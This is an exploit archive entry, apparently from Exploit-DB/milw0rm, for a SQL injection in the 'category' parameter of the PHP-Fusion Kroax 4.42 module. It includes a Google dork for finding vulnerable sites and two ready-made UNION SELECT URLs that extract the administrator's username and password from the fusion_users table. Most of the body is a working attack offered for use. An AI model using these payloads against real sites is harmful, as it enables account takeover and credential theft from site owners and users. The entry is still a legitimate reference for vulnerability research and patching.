Lucene search
Boom3rangEDB-ID:5942HistoryJun 26, 2008 - 12:00 a.m.
PHP-Fusion Mod Kroax 4.42 - 'category' SQL Injection
2008-06-2600:00:00
boom3rang
www.exploit-db.com
39
AI Score
7.4
Confidence
Low
==========================================================
The kroax php_fusion Remote SQL-injection.
==========================================================
##################################
Author : boom3rang
Contact : [email protected]
webpage : www.khg-crew.ws
##################################
--- Remote SQL Injection ---
[+]Google Dork: inurl:"kroax.php?category"
--------------
Exploit
--------------
example:
www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
[+] password:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password.
========================================================== Greetz to: All my Albanian brothers ==========================================================
# milw0rm.com [2008-06-26]Related
nvd
nvd
CVE-2008-5196
2008-11-21 17:30:00
prion
prion
Sql injection
2008-11-21 17:30:00
cve
cve
CVE-2008-5196
2008-11-21 17:30:00
cvelist
cvelist
CVE-2008-5196
2008-11-21 17:00:00